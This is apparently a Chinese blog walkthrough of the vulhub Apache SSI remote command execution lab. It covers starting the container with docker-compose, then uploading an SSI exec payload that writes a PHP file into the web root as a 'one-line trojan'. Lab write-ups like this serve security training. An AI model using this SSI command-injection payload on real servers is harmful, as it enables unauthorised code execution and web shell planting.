vulhub中的Apache SSI 远程命令执行漏洞

爱喝水的泡泡2024-01-09 11:42

Apache SSI 远程命令执行漏洞

1.cd到ssi-rce

cd /opt/vulhub/httpd/ssi-rce/

2.执行docker-compose up -d

docker-compose up -d

3.查看靶场是否开启成功

dooker ps

拉取成功了

4.访问url

这里已经执行成功了,注意这里需要加入/upload.php

5.写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

6.提交查询

7.点击shell.shtml

8.查看是否写入成功

docker exec -it ssi-rce_apache_1 /bin/bash

9.获取phpinfo

相关推荐
zhangphil7 小时前
Windows环境Apache httpd 2.4 web服务器加载PHP8:Hello,world!
php·apache·httpd
邓草2 天前
帝国CMS系统开启https后,无法登陆后台的原因和解决方法
linux·php·apache
卓琢2 天前
(一)Web 网站服务之 Apache
前端·apache
微刻时光2 天前
Linux编译部署PHP环境
linux·开发语言·redis·git·php·apache·composer
卓琢2 天前
Web 网站服务(二):深入探索 Apache 的高级功能
前端·apache
栀栀栀栀栀栀3 天前
Apache POI 2024/10/2
apache
武子康3 天前
大数据-153 Apache Druid 案例 从 Kafka 中加载数据并分析
java·大数据·分布式·flink·kafka·apache
zhangphil4 天前
Windows安装启动apache httpd 2.4 web服务器
apache
武子康4 天前
大数据-154 Apache Druid 架构与原理详解 基础架构、架构演进
java·大数据·clickhouse·hdfs·架构·flink·apache
倩倩_ICE_王王4 天前
Apache安装后无法启动的问题“不能再本地计算机启动apache”
bug·apache
热门推荐
01分享几个惊艳的 Three.js 个人站点02【经验分享】Ubuntu22.04安装微信(linux官方版)032024年高教社杯数学建模国赛C题超详细解题思路分析04组基轨迹建模 GBTM的介绍与实现(Stata 或 R)05安卓系列机型永久去除data分区加密 详细步骤解析06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提07springer 在线投稿编译踩坑08Ubuntu24.04安装中文输入法09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文10CTF网络安全大赛简单的web抓包题目:HEADache